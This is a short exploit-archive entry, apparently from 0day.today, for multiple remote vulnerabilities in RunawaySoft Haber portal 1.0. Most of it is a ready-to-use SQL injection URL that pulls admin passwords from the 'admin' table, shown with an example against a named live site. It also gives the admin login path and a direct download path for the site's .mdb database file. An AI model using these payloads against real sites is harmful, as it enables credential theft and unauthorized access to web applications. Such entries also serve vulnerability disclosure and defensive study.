id: 1881
date: 05/15/2007
title: RunawaySoft Haber portal 1.0 (tr) Multiple Remote Vulnerabilities
author: kerem125
cves: 

=================================================================
RunawaySoft Haber portal 1.0 (tr) Multiple Remote Vulnerabilities
=================================================================



############################################################################################################
#Discovered by: kerem125 & gsy
#Exploit: /devami.asp?id=14 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#Admin Login : haber/admin/kontrol.asp
#Example: http://www.runaway.somee.com/rshaber/haber/devami.asp?id=1 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#
Contact : kerem125

#Special Thanks to : by_emR3 - Bolivar - VolTiGoRe - CyberGhost - KinSize - xYz - F-10
############################################################################################################

RunawaySoft Haber portal v1.0 (tr) Database Disclosure
Example: [site.com]/[path]/haber/data/xice.mdb



#  0day.today [2023-03-26]  #